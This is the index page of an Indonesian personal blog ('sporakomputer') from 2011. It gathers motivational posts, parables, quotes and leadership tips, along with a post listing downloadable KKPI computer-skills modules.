Banyak orang "Bodoh" yang hanya mengandalkan semangat dan kerja keras plus sedikit kerja cerdas, menjadikannya sukses dalam berbisnis. Dilain sisi kebanyakan orang "Pintar" malas untuk berkerja keras dan sok cerdas,

16. Mencampur adukan Keuangan
Seorang "pintar" berperilaku bodoh dengan mencampuradukan keuangan pribadi dan perusahaan.

17. Mudah Menyerah
Orang "Pintar" merasa gengsi ketika gagal di satu bidang sehingga langsung beralih ke bidang lain, ketika menghadapi hambatan. Orang "Bodoh" seringkali tidak punya pilihan kecuali mengalahkan hambatan tersebut.

Readmore »

Description: 17 Perbedaan Orang Bodoh dan Orang Pintar Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: 17 Perbedaan Orang Bodoh dan Orang Pintar

Friday, February 18, 2011

Free Download Tutorial Modul KKPI Lengkap

Assalamualaikum wr.wb.

Setelah lama tidak posting akhirnya sporakomputer aktif melakukukan posting kembali...!
Posting kali ini berjudul tutorial modul kkpi lengkap,,,!

Ya...! seperti judul diatas modul kkpi yang sporakomputer sharing kali ini memang benar-benar lengkap...! Karena sporakomputer telah menemukan 9 modul kkpi yang sangat jarang dan langka sekali. Jadi bagi sobat yang menemukan link ini dan mendownloadnya di blog sporakomputer ini. Insya Allah sobat termasuk orang-orang yang beruntung...! Pasalnya modul ini sangat rahasia dan banyak diburu oleh orang-orang dunia persilatan. ........heheheh......! Berikut langsung meluncur ke TKP...!
  1. Modul1 KKPI Mengetik10 Jari
  2. Modul2 KKPI Mengidentifikasi dan Mengoperasikan Komputer Personal
  3. Modul3 KKPI Mengoperasikan Peripheral Komputer
  4. Modul4 KKPI Mengoperasikan Perangkat Lunak Pengolah Kata
  5. Modul5 KKPI Mengoperasikan Perangkat Lunak Lembar Sebar 
  6. Modul6 KKPI Mengoperasikan Perangkat Lunak Prensentasi
  7. Modul7 KKPI Mengoperasikan Perangkat Lunak Basis Data
  8. Modul8 KKPI Melakukan Koneksi Internet Dan Bekerja Dengan Internet
  9. Modul9 KKPI Pengelolaan Informasi
Readmore »

Description: Free Download Tutorial Modul KKPI Lengkap Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Free Download Tutorial Modul KKPI Lengkap

Wednesday, February 2, 2011

Andriewongso : Misteri Telur, Wortel, dan Kopi

Assalamualaikum wr.wb.
Sobatku sekalian coba perhatikan artikel sporakomputer berikut ini :

Sepulang dari sekolah Andi membanting pintu dengan keras. Kaget dengan suara keras dari pintu yang dibanting, ayahnya yang seorang koki di restoran menghampiri andi dan bertanya: “Apa yang terjadi Andi, kelihatannya kau sangat marah?” Hari ini adalah hari terburuk dalam hidupku ayah?”, kata Andi. “Memangnya ada apa Ndi?” lanjut sang ayah. Sudahlah yah, aku tidak ingin membicarakan hal-hal yang tidak aku sukai ini, jawab Andi dengan ketus sambil masuk kamar tanpa mengabaikan ayahnya.

Saat makam malam tiba, Andi bersama ayahnya melahap makanan yang telah dimasak sendiri oleh Ayahnya. Ibu Andi sudah meninggal dan mereka tidak memiliki pembantu. Setelah makan selesai dengan nada tenang, ayah Andi bertanya: ceritakan kepada ayah kejadian tadi siang yang membuatmu jengkel, ayah ingin mendengarnya.

Dengan nada malas Andi berkata, baiklah. Bagaimana aku tidak sebel, sewaktu aku di kantin sedang makan tiba-tiba nita, pacarku minta putus tanpa kasih tahu alasannya, habis itu aku ulangan dapat nilai nol alias salah semua pas pulang nabrak ayam orang dan harus menggantinya lima puluh ribu. Sepertinya semua jahat kepadaku, nita, pak guru dan ayam sialan itu.

Setelah Andi selesai bercerita, ayahnya mengajak andi pergi ke dapur. “Ayo sini, aku tunjukkan sesuatu untukmu”. Dengan berat hati Andi mengikuti ayahnya ke dapur. Setelah sampai di dapur Ayahnya menyalakan 3 tungku yang msing-masing berisi air kemudian direbus. Setelah air mendidih, pada panci pertama dimasukkan wortel, panci kedua telur dan panci ketiga bubuk kopi.

Dengan penuh keheranan, Andi menunggu aksi selanjutnya yang akan didemonstrasikan ayahnya. Setelah 15 menit berlalu, sang ayah mengangkat wortel, telur, dan kopi yang sudah terseduh dari ketiga panci tersebut dan memberikannya kepada Andi sambil berkata:
“wortel yang sebelumnya keras berubah menjadi lembek setelah direbus. Telur yang sebelumnya lembek (encer) berubah menjadi keras setelah direbus. Serbuk kopi yang semula tidak enak untuk dinikmati berubah menjadi kopi special yang nikmat rasanya setelah direbus dengan air mendidih.”

“Apa hubungannya dengan kejadian tadi siang yang menyebalkan itu ayah?” Tanya Andi menyelidik. Telur, wortel, dan kopi mewakili 3 sifat manusia yang berbeda.

Perhatikanlah telur!
Telur yang sebelumnya lembek (encer) berubah menjadi keras setelah direbus. Mewakili karakter hidup manusia yang dalam kehidupan normalnya adalah seorang pribadi yang lemah lembut dan santun berubah menjadi sosok yang kasar, beringas dan merusak setelah menghadapi kesulitan dan masalah hidup.


Perhatikanlah wortel!
Wortel yang sebelumnya keras berubah menjadi lembek setelah direbus. Mencerminkan karakter hidup insan yang dalam kehidupan normalnya adalah seorang figure yang tegar dan tegas berubah menjadi diri yang lemah, mudah menyerah dan putus asa saat masalah datang menghampirinya.



Perhatikanlah serbuk kopi!
Serbuk kopi yang semula tidak enak untuk dinikmati berubah menjadi kopi special yang nikmat rasanya setelah direbus dengan air mendidih. Menyimbolkan pribadi yang kelihatan biasa-biasa saja dalam kesehariannya namun mampu menjelma menjadi pribadi yang mampu memberi warna lingkungannya (memberikan pengaruh positif pada masyarakat) setelah masalah dan kesulitan hidup menyapanya.
“Andi, pilihan ada di tanganmu. Kamu boleh menjadi pribadi telur, wortel atau kopi setelah mengalami masalah. Karena kamulah sendiri yang akan menuai hasil dari pilihanmu,” kata ayah Andi menutup nasihatnya.

Sumber dari sini
Readmore »

Description: Andriewongso : Misteri Telur, Wortel, dan Kopi Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Andriewongso : Misteri Telur, Wortel, dan Kopi

Penghargaan Untuk Seorang Prajurit

Assalamualaikum wr.wb.

Pada suatu hari, sersan pelatih muncul di antara sekelompok prajurit muda yang sedang mengadakan latihan militer. Tiba-tiba ia mencampakkan sebuah granat tangan ke tengah-tengah mereka.

Mereka lari berpencar, cepat-cepat mencari perlindungan. Sersan itu kemudian mengatakan bahwa granat itu tidak “hidup” dan ia cuma ingin melihat reaksi mereka.



Keesokan harinya, seorang prajurit yang baru masuk, menggabungkan diri ke kelompok itu. Sersan pelatih mengatakan kepada mereka agar jangan memberitahu prajurit baru itu tentang apa yang akan terjadi.

Sewaktu sersan itu kemudian muncul dan melemparkan granat ke tengah-tengah mereka, prajurit baru itu, yang tidak tahu bahwa granat itu takkan meledak, buru-buru menjatuhkan diri di atas granat agar ledakannya tidak mencederai rekan-rekannya. Ia mau berkorban demi keselamatan sahabat-sahabatnya.

Tahun itu ia dianugerahi medali satu-satunya untuk keberanian dan ketabahan yang diberikan bukan pada waktu perang.
Readmore »

Description: Penghargaan Untuk Seorang Prajurit Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Penghargaan Untuk Seorang Prajurit

Harga Sebuah Keajaiban

Assalamualaikum wr.wb.

Sally berumur 8 tahun ketika dia mendengar orangtuanya sedang berbicara mengenai adik lelakinya, Georgi yang menderita sakit parah… Hanya operasi yang sangat mahal bisa menyelamatkannya, tapi mereka tak punya biaya.

Sally mendengar ayahnya berkata, “Hanya keajaiban yang bisa menyelamatkannya”

Sally mengambil celengan dari tempat persembunyiannya, lalu dikeluarkannya semua isi celengan ke lantai dan menghitung semua uangnya.

Dengan membawa uang, Sally menyelinap keluar dan pergi ke apotik.

“Apa yg kamu perlukan?” tanya apoteker.

“Saya mau bicara mengenai adikku, dia sakit dan saya mau membeli keajaiban”, jawab Sally.

“Apa yang kamu katakan?”

“Ayahku mengatakan hanya keajaiban yang bisa menyelamatkan jiwanya. Jadi berapa harganya?”

“Kami tidak menjual keajaiban, adik kecil”

“Saya punya uang. Katakan saja berapa harga keajaiban?”

Seorang pria berpakaian rapi berhenti dan bertanya, “Keajaiban jenis apa yang dibutuhkan oleh adikmu?”

“Saya tak tahu”, jawab Sally

Air mata mulai menetes di pipinya.

“Saya hanya tau dia sakit parah dan ayah mengatakan bahwa ia membutuhkan operasi. Orangtuaku tak mampu membayarnya, tapi saya punya uang”

“Berapa uang yang kamu punya?”

“Satu dollar dan sebelas sen,” jawab Sally dgn bangga

“Kebetulan sekali,” kata pria itu sambil tersenyum, “Satu dollar dan sebelas sen, Harga yg tepat untuk membeli keajaiban yang dapat menolong adikmu”

Dia mengambil uang, kemudian memegang tangan Sally dan berkata:
“Bawa saya kepada adikmu, saya mau bertemu dengannya dan orangtuamu”

Pria itu adalah Dr. Carlton Armstrong, seorang ahli bedah terkenal.

Operasi dilakukannya tanpa biaya dan butuh waktu yang tak lama. Georgi kembali ke rumah dalam keadaan sehat.

Orang tuanya sangat bahagia. Sally tersenyum… Dia tau pasti berapa harga keajaiban tersebut,
‘Satu dollar dan sebelas sen’, ditambah dengan keyakinan.

Sumber dari sini
———————————————
Sahabat inspirasi yang luar biasa,
Dalam hidup ini terkadang kita mengalami suatu permasalah yang sangat berat. Dan tidak jarang kita mulai mempertanyakan, “apakah benar Tuhan menyayangiku? Dimana keajaibanNya? Mengapa Ia tak kunjung menolongku?”

Tuhan itu ada, dan Dia sangat menyayangi kita dan keajaibanNya pun nyata. Terkadang Tuhan memang seolah-olah membiarkan kita “berjalan” seorang diri, tapi itu bukan untuk menghukum kita, tapi karena Dia ingin kita mendekatkan diri padaNya.

Milikilah keyakinan penuh pada Tuhan, ikhlaskan diri untuk menerima rencanaNya. Itulah yang namanya iman. Iman menjauhkan kekuatiran dan kegelisahan, ia membuat pemiliknya menikmati ketenangan walau tak ada alasan untuk tetap tenang.

Jadi, jika pencobaan datang dan menghantam hidup kita hingga kita bertekuk lutut, sadarilah bahwa itu adalah posisi yang paling tepat untuk berdoa dan bertobat. Keep your faith!

Share and be happy!
if you like it, you can share it.
Dengan berbagi kita akan hepi.
Readmore »

Description: Harga Sebuah Keajaiban Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Harga Sebuah Keajaiban

Kata-Kata Motivasi

Assalamualaikum wr.wb.

Kali ini sporakomputer akan memberikan beberapa kata-kata motivasi yang mungkin bisa dibuat oleh sobat pembaca sebagai sebuah renungan untuk menapaki masa depan yang lebih baik.

Keberanian bukan berarti tiadanya rasa takut, melainkan adanya penilaian bahwa ada hal yang lebih penting daripada rasa takut. – Ambrose Redmoon

Gagal adalah sebuah peristiwa, bukan orangnya. Tak ada orang gagal,yang ada hanya orang yang menyerah pada kegagalan. – D. Hendriyanto

“Cara bermain sebuah tim sangat menentukan kesuksesan mereka. Anda boleh memiliki sederet pemain bintang yang paling hebat di dunia. Tapi jika mereka tidak bisa bermain bersama, tim tidak akan menghasilkan apa-apa.” Babe Ruth (1895-1948), pemain bisbol legendaris Amerika
Readmore »

Description: Kata-Kata Motivasi Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Kata-Kata Motivasi

Menjadi Luar Biasa!

Assalamualaikum wr.wb.

Kali ini sporakomputer mengajak kepada anda semua untuk meninggalkanu kebiasan-kebiasaan buruk yang biasa kita lakukan.  Tujuannya untuk apa....? Tujuannya untuk satu hal......! yaitu menjadi orang yang semakin hari kian membaik dan menjadi orang yang benar-benar beruntung di dunia dan di akhirat (luar biasa).



Setiap orang dapat menjadi luar biasa, karena sesungguhnya kita semua adalah LUAR BIASA, kita sendirilah yang membuat diri kita menjadi biasa.

Menjadi luar biasa bukan berarti kita harus selalu mendapatkan pengalaman yang luar biasa (luar biasa menderita, luar biasa menakjubkan, dll), menjadi luar biasa juga bukan berarti kita harus melakukan hal yang luar biasa.

Perasaan luar biasa dapat kita miliki saat kita mampu menyikapi seluruh pengalaman hidup kita dengan sikap yang luar biasa, sikap yang mau terus belajar dan selalu mengambil makna positif dari setiap peristiwa. Menjadi luar biasa juga dapat kita lakukan dengan melakukan hal-hal yang biasa dengan cara yang luar biasa.
Jadilah orang-orang yang luar biasa dari sekarang. Banyak orang merasa tidak puas karena mereka merasa harus melakukan sesuatu yang besar (contoh: kebaikan besar, sukses yang besar) untuk menjadi luar biasa. Hentikan perasaan itu, hal itu hanya akan membuat kita terbebani.
Bebaskan dirimu! Jangan pernah mengabaikan hal-hal kecil, karena semua hal besar selalu dimulai dari sebuah hal kecil yang terkadang tidak pernah diperhatikan oleh orang lain.
Jangan pernah mengabaikan kesempatan untuk berbuat kebaikan kecil, karena mengabaikan kesempatan untuk berbuat baik, sekecil apapun, itu adalah sebuah kejahatan.

ayo kita belajar bersama untuk menjadi orang yang luar biasa.
Kita semua adalah LUAR BIASA, diri kita sendiri-lah yang membuat jadi BIASA. Jangan mau jadi BIASA karena kita LUAR BIASA!
Readmore »

Description: Menjadi Luar Biasa! Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Menjadi Luar Biasa!

Tak Ada Gading Yang Tak Retak

Assalamualaikum wr.wb.
“Tak ada gading yang tak retak.”
Sebuah peribahasa yang sangat populer saat sporakomputer masih SD, sebuah peribahasa yang menggambarkan bahwa tak ada manusia yang sempurna. Ketika SD sporakomputer sangat suka sekali menggunakan peribahasa ini sebagai slogan, dan sampai saat ini pun sporakomputer tetap menyukai peribahasa ini.

Tetapi sayang, peribahasa ini kadang digunakan sebagai pembenar kesalahan-kesalahan kita. Setiap kali ada yang berbuat salah, mereka selalu berdalih: 

“Tidak ada manusia yang sempurna. Jadi sesekali salah tidak apa-apa.”
atau

“Kita kan bukan Tuhan, jadi wajar jika kita tidak sempurna dan berbuat salah.”
Ya, mereka benar. Kita hanyalah manusia. Tidak ada, dan tidak akan pernah ada manusia yang sempurna apalagi sempurna seperti Tuhan.

Tapi ingat, sebuah gading retak pun, ditangan seorang ahli dan setelah mengalami berbagai macam proses, dapat menjadi sesuatu yang indah dan bernilai tinggi. Begitu juga dengan kita. Tidak ada manusia yang sempurna, tetapi dalam hidup ini, kita harus berusaha menjadi sempurna dan bernilai tinggi. Percayakan hidup kita pada Seorang Ahli, Tuhan. Kerjakan yang menjadi bagian kita, dan biarkan Tuhan mengerjakan bagianNya.

Sahabat inspirasi yang luar biasa,
Apapun kesalahan kita, apapun kelemahan kita saat ini, semuanya tidak akan menghalangi kita untuk menjadi lebih baik jika kita tulus menginginkannya. Teruslah berusaha, karena jika kita tidak berusaha menjadi yang terbaik, lalu kita akan menjadi apa?

Jadilah yang terbaik, kita berhak untuk menjadi yang terbaik.

Salam,
Readmore »

Description: Tak Ada Gading Yang Tak Retak Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Tak Ada Gading Yang Tak Retak

Rumput Tetangga

Assalamualaikum wr.wb.

Kali ini sporakomputer menulis sebuah cerita motivasi tentang pentingnya kata bersyukur....! Melalui artikel sporakomputer ini, sporakomputer berharap kepada para pembaca yang baik untuk selalu bercermin kepada dirinya masing-masing, karena dengan lebih banyak melihat kedalam maka sesunggunya kita akan menjadi lebih bijak dalam menyikapi kehidupan ini.

“Rumput tetangga selalu tampak lebih hijau.”

Sudah menjadi sifat dasar manusia untuk selalu menginginkan hal yang belum dimilikinya, dan bahkan ada sebagian yang sampai terjebak dalam perasaan iri. “kenapa aku tidak setampan dia?”, “kenapa aku tidak sekaya dia?”, dan lainnya. Seperti perumpamaan di atas, sehijau-hijaunya rumput yang ada dihalaman kita, tetapi selalu saja ada yang mengatakan bahwa rumput milik tetangga lebih hijau dari miliknya.

Seperti sebuah rumput yang memiliki begitu banyak varian dan menyebabkan perbedaan warna, seharusnya kita juga harus selalu menyadari bahwa anugrah yang dimiliki setiap orang pun berbeda. Dan pada saat variannya sama pun, ada berbagai faktor yang membuat “hijau” nya berbeda, kesuburan tanah, pupuk yang digunakan, sampai cara perawatan. Karena itu, ayo kita belajar untuk bersyukur atas segala sesuatu yang telah menjadi milik kita, meskipun hasil yang diperoleh tidak sebaik “tetangga” kita, tidak perlu iri. Jadikan itu sebagai pelajaran, mungkin “tetangga” kita telah berusaha lebih keras, mereka selalu belajar, dan juga mereka memiliki cara tersendiri dalam menggunakan anugrah yang ada.

Jadi, saat kita mulai merasa bahwa “rumput tetangga tampak lebih hijau”, jadikan itu sebagai alarm periksa kembali “taman” kita, mungkin kita belum merawat dan mengelolanya dengan maksimal.

Sahabat inspirasi yang luar biasa,
Jangan pernah jadikan perbedaan kita dengan yang lain sebagai alasan untuk iri hati. Mari kita bersyukur atas segala sesuatu yang telah kita terima, kita jadikan perbedaan itu sebagai bahan pembelajaran untuk menjadi lebih baik. Dan jangan pernah dilupakan bahwa “rumput tetangga” meskipun tampak baik, tetapi belum tentu dapat tumbuh subur bila ditanam di halaman kita. “Rumput tetangga” terkadang tampak lebih hijau, tapi “rumput kita” tetaplah “rumput” yang terbaik untuk kita. Karena Tuhan telah menyediakan porsi yang berbeda-beda untuk seluruh umatNya. Tetaplah bersemangat, teruslah belajar agar yang baik menjadi lebih baik, dan yang lebih baik menjadi yang terbaik. GET IT!!!

Share and be happy!

Teruslah berbagi, karena dengan berbagi kita akan hepi.
Readmore »

Description: Rumput Tetangga Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Rumput Tetangga

8 Fakta Orangtua – Anak

Assalamualaikum wr.wb.

Kali ini sporakomputer menuliskan sebuah artikel yang sangat berharga berhubungan dengan kehidupan antara orang tua dan anak. Sporakomputer berharap setelah membaca artikel ini para orang tua bisa lebih mengenal anaknya dan mengetahui kebiasaan unik anaknya. Dan bagi para anak-anak agar selalu berbakti kepada kedua orang tuanya. Amien...!




8 fakta yang terjadi, antara anak terhadap orangtua:
  1. Anak sering berpikir orangtuanya pilih kasih terhadap saudaranya.
  2. Anak sering merasa terkekang oleh orangtuanya.
  3. Anak sering merasa lebih pintar dan membantah nasihat orangtuanya.
  4. Anak sering merasa bahwa dirinya kurang disayang.
  5. Anak sering memperhitungkan segala sesuatu yang telah ia lakukan untuk orangtuanya.
  6. Anak sering membingungkan harta warisan.
  7. Anak sering menganggap remeh sesuatu pekerjaan yang telah diberikan.
  8. Anak sering membentak orangtuanya saat berbicara.

Namun ada 8 fakta yang tidak diketahui atau kurang dipahami oleh anak:
  1. Di balik sepengetahuannya, orangtuanya sering memujinya di depan saudaranya.
  2. Semua yang dilakukan orangtua. hanya untuk kebaikan masa depan anak.
  3. Anak kurang mengerti bahwa orangtuanya telah menjalani kehidupan yang lebih keras dibanding anak.
  4. Dalam setiap doa dan harapan orangtua, nama anak sering disebut.
  5. Orangtua (ibu) tidak pernah memberitahukan mengenai pengorbanannya selama mengandung dan melahirkan Anda.
  6. Orangtua telah mempersiapkan harta warisan untuk anaknya, hanya tinggal menunggu waktu yang tepat untuk menyerahkan.
  7. Orangtua tidak rela melihat anaknya hidup bersusah – susah di tempat orang lain.
  8. Setiap kali orangtua membentak, hati mereka akan bergetar dan menyebabkan umurnya lebih pendek.

Sahabat yang Luar Biasa,
Kasih dan kepedulian orangtua pada anak itu, tanpa syarat. Sayangnya, hal itu sering tidak tampak di mata kita. Kita mungkin bahkan berpendapat bahwa bahwa orangtua harus selalu berada di posisi siap membantu, kapan pun! Jika hal itu tidak dapat terpenuhi, segera kita memvonis: tidak sayang, yang tidak mengerti anak sendiri, atau dilanda perasaan sedih, marah, dan kecewa yang hanya merugikan diri sendiri.
Mari teman-teman, belajar mengendalikan diri, agar kita mampu hidup secara harmonis dengan keluarga, khususnya orangtua, saudara, dan masyarakat.
Dan jika Anda merasa bersalah kepada orangtua, hampiri mereka, peluk mereka, bisikkan kata MAAF di telinga mereka dan berjanji untuk tidak melakukannya lagi.
Love your parents!
__
Share and be Happy!
Teman-teman yang luar biasa! Saya sering mendapatkan sharing berupa cerita atau  pesan pendek dari rekan & sahabat. Saya pikir, tidak ada salahnya jika hal yang baik saya bagikan kembali di sini. Mungkin ada di antara teman-teman di sini, yang sudah pernah membacanya (via blog, BBM, website, dll). Silakan teruskan lagi kepada teman lain. Dengan berbagi, kita akan ‘hepi’!
Bagi yang belum pernah membacanya, tentunya ada makna / “wisdom” yang bisa kita ambil.
Salam sukses, luar biasa!!
Readmore »

Description: 8 Fakta Orangtua – Anak Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: 8 Fakta Orangtua – Anak

Berani Mimpi, Berani Sukses

Assalamualaikum wr.wb.

Kali ini sporakomputer akan memberikan artikel yang berhubungan dengan sebuah kesuksesan. Dari artikel yang sporakomputer tulis ini sporakomputer berharap Anda semua yang membacanya dapat  menjadi orang-orang yang sukses dimasa depan. Amien...!

Awal tahun sering dianggap momentum yang tepat untuk memulai hidup baru. Tahun lalu mungkin tak banyak prestasi yang bisa kita raih, tahun ini adalah saat terbaik untuk memperbaikinya. Tahun lalu mungkin kita gagal meraih cita-cita yang kita impikan, tahun ini adalah waktu yang tepat untuk lebih memfokuskan segala kemampuan dan bekerja lebih keras lagi agar impian itu bisa terwujud.

Setinggi apa mimpi-mimpi bisa kita pancangkan? Banyak di antara kita yang bermimpi saja tak berani karena takut kecewa jika kelak tak bisa meraihnya. Akhirnya mimpinya biasa-biasa saja. Atau banyak juga yang hanya bermimpi tanpa berusaha meraihnya. Akhirnya mimpi-mimpi itu hanya berhenti sampai pada mimpi saja.

Jika kita melihat ke belakang, kita akan menemukan betapa berharganya mimpi-mimpi itu. Apa yang kita nikmati saat ini seperti telepon genggam, komputer, kendaraan yang kita gunakan, dan apa pun yang kita rasakan manfaatnya dan kita kagumi, semua itu awalnya dari mimpi. Para penciptanya kerap diolok-olok orang-orang sekitarnya karena impian mereka dianggap hayalan yang tak mungkin bisa diwujudkan.

Meski begitu mereka tetap yakin bahwa mimpi-mimpi itu bukan sesuatu yang mustahil. Ejekan-ejekan yang diterimanya justru menjadi semacam vitamin kehidupan yang mendorong semangatnya untuk terus berusaha. Mereka tak patah semangat untuk mencoba dan mencoba lagi, kegagalan demi kegagalan tak menyurutkan semangatnya untuk mencoba lagi, dan akhirnya ketekunan mereka berhasil mewujudkan impiannya. Itulah kekuatan mimpi!
Readmore »

Description: Berani Mimpi, Berani Sukses Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Berani Mimpi, Berani Sukses

Karakteristik Pemimpin Sukses

Assalamualaikum wr.wb.

Kali ini sporakomputer menulis sebuah arikel yang berhubungan dengan kepemimpinan sporakomputer berharap besar kepada Anda yang membaca artikel ini dapat memnjadi seorang pemimpin yang adil dan bijak. Amien...!

Leadership bukanlah sesuatu yang Anda lakukan kepada people, melainkan sesuatu yang Anda lakukan dengan people.


Terdapat beberapa karakteristik yang dimiliki oleh seorang pemimpin yang sukses, antara lain :

1. They know their company
Pemimpin harus mengetahui seluk beluk mengenai bisnisnya secara mendetail. Selain itu, seorang pemimpin juga harus selalu mengikuti perkembangan trend terbaru. Sehingga, mereka menyadari jika ada peluang yang muncul.

2. They know where they want to take the company
Seorang pemimpin tentunya harus memiliki visi, yakni pandangan jauh ke depan mengenai kemana arah perusahaan. Selain itu, ia juga tentunya harus mampu mengartikulasikan visinya tersebut dengan bahasa yang jelas dan sederhana. Selanjutnya, pemimpin juga harus bisa mendisiplinkan proses untuk mengatur sumber daya dan memberdayakan karyawan untuk menjalankan visi perusahaan.

3. They manage the strategy
Strategi harus mempunyai ukuran tertentu (parameter). Jika Anda tidak bisa mengukur strategi, maka berarti Anda tidak bisa mengelolanya. Pemimpin harus terus fokus pada strateginya, dan terus melakukan evaluasi terhadap strategi tersebut.

Prioritas juga harus ditetapkan, supaya aktivitas yang penting dilakukan terlebih dulu. Kemudian seorang pemimpin tentunya juga harus mengetahui apa saja yang harus dilakukannya, atau mendelegasikan pekerjaannya kepada orang lain yang mampu.

4. Managing people
Mengelola orang adalah hal yang sangat penting bagi pemimpin. Poin-poin penting bagi pemimpin dalam mengelola karyawan antara lain adalah pemberdayaan karyawan, serta mengajarkan kepada mereka mengenai bagaimana menyelesaikan pekerjaaannya. Pemimpin juga harus mampu memotivasi karyawannya serta belajar untuk memberikan feedback yang positif.

Komunikasi juga menjadi salah satu kunci penting dalam mengelola karyawan. Seorang pemimpin harus tahu bagaimana cara berkomunikasi yang baik, dan ia juga harus mampu mengembangkan komunikasi di organisasi yang dipimpinnya.

Pemimpin harus punya Emotional Intelligence yang bagus, karena dalam memimpin, tentunya kemampuannya dalam mengidentifikasi, menggunakan, memahami dan mengelola emosi akan sangat bermanfaat.

5. Personal Strength
Personal strength adalah kekuatan pribadi dari masing-masing pemimpin. Beberapa personal strength yang idealnya dimiliki seorang pemimpin antara lain:
  • Telling The Hard Truth: Sebuah bisnis tentunya mengalami siklus turun naik. Yang sulit bagi pemimpin adalah jujur mengkomunikasikan kondisi perusahaan ketika sedang turun kepada karyawannya. Menurut Nitin Nohria dalam buku Beyond The Hype; Rediscovering the Essence of Management, mengatasi hambatan yang terjadi sementara itu tetap menunjukkan kemampuan untuk terus maju merupakan ujian sejati sebuah kepemimpinan.
  • Courage To Change: Seorang pemimpin harus berani untuk mengambil langkah perubahan
  • The Role of Knowledge: Seperti yang dikemukakan John Kotter dari Harvard Business School, seorang pemimpin harus punya pemahaman yang cukup baik untuk dapat membuat strategi yang cerdas.
  • Nature/Nurture: Menurut Nitin Nohria, salah satu karakteristik yang umum dari pemimpin adalah, mereka mau belajar dan mengelami perubahan dalam hidupnya.
  • Willing to Take Risks: Seorang pemimpin mengambil risiko dan memperoleh manfaatnya.
Sumber dari sini
Readmore »

Description: Karakteristik Pemimpin Sukses Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Karakteristik Pemimpin Sukses

Belajar dari Kapak Pemotong Kayu

Assalamualaikum wr.wb.

Alkisah, seorang pedagang kayu menerima lamaran seorang pekerja untuk menebang pohon di hutannya. Karena gaji yang dijanjikan dan kondisi kerja yang bakal diterima sangat baik, maka calon penebang pohon itu pun bertekad untuk bekerja sebaik mungkin.

Saat akan mulai bekerja, si majikan memberikan sebuah kapak dan menunjukkan area kerja yang harus diselesaikan dengan target waktu yang telah ditentukan kepada si penebang pohon.

Hari pertama bekerja, ia berhasil merobohkan delapan batang pohon. Sore hari, mendengar hasil kerja si penebang, sang majikan terkesan dan memberikan pujian dengan tulus. “Hasil kerjamu sungguh luar biasa! Saya sangat kagum dengan kemampuanmu menebang pohon-pohon itu. Belum pernah ada yang sepertimu selama ini. Teruskan bekerja seperti itu.”

Karena sangat termotivasi oleh pujian majikannya, keesokan hari si penebang bekerja lebih keras lagi. Tetapi dia hanya berhasil merobohkan tujuh batang pohon. Hari ketiga, dia bekerja lebih keras lagi, tapi hasilnya tetap tidak memuaskan, bahkan mengecewakan. Semakin bertambah hari, semakin sedikit pohon yang berhasil dirobohkan.

“Sepertinya aku telah kehilangan kemampuan dan kekuatanku. Bagaimana aku dapat mempertanggungjawabkan hasil kerjaku kepada majikan?” pikir penebang pohon, merasa malu dan putus asa. Dengan kepala tertunduk dia menghadap kepada sang majikan, meminta maaf atas hasil kerja yang kurang memadai dan mengeluh tidak mengerti apa yang telah terjadi.

Sang majikan menyimak dan bertanya kepadanya, “Kapan terakhir kamu mengasah kapak?”

“Mengasah kapak? Saya tidak punya waktu untuk itu! Saya sangat sibuk setiap hari menebang pohon dari pagi hingga sore dengan sekuat tenaga,” kata si penebang.

“Nah, di sinilah masalahnya. Ingat hari pertama kamu kerja? Dengan kapak baru dan terasah, maka kamu bisa menebang pohon dengan hasil maksimal. Hari-hari berikutnya, dengan tenaga yang sama, menggunakan kapak yang sama, tetapi tidak diasah. Kamu tahu sendiri, hasilnya semakin menurun. Maka, sesibuk apapun, kamu harus meluangkan waktu untuk mengasah kapakmu, agar setiap hari bisa bekerja dengan tenaga yang sama dan hasil yang maksimal. Sekarang, mulailah mengasah kapakmu dan segera kembali bekerja!” perintah sang majikan. Sambil mengangguk-anggukkan kepala dan mengucap terima kasih, si penebang berlalu dari hadapan majikannya untuk mulai mengasah kapak.

Netter yang Luar Biasa,
Sama seperti si penebang pohon, kita pun setiap hari, dari pagi hingga malam hari, seolah terjebak dalam rutinitas terpola. Sibuk, dan sibuk terus, sehingga seringkali melupakan sisi lain yang sama pentingnya, yaitu istirahat sejenak, “mengasah” dan mengisi hal-hal baru untuk menambah pengetahuan, wawasan, dan spiritual.

Seperti pepatah yang mengatakan “istirahat bukan berarti berhenti, tetapi untuk menempuh perjalanan yang lebih jauh lagi,” tentunya istirahat kita seharusnya menjadi istirahat yang berkualitas dan bukan untuk bermalas-malasan. Jika kita mampu mengatur ritme kegiatan seperti ini, pasti kehidupan kita akan dinamis!

Salam sukses, luar biasa!

Sumber : http://ndut2s.wordpress.com
Readmore »

Description: Belajar dari Kapak Pemotong Kayu Rating: 5 Reviewer: Rizal Romadhoni Hidayatullah ItemReviewed: Belajar dari Kapak Pemotong Kayu

Recent Posts

Related Posts Plugin for WordPress, Blogger...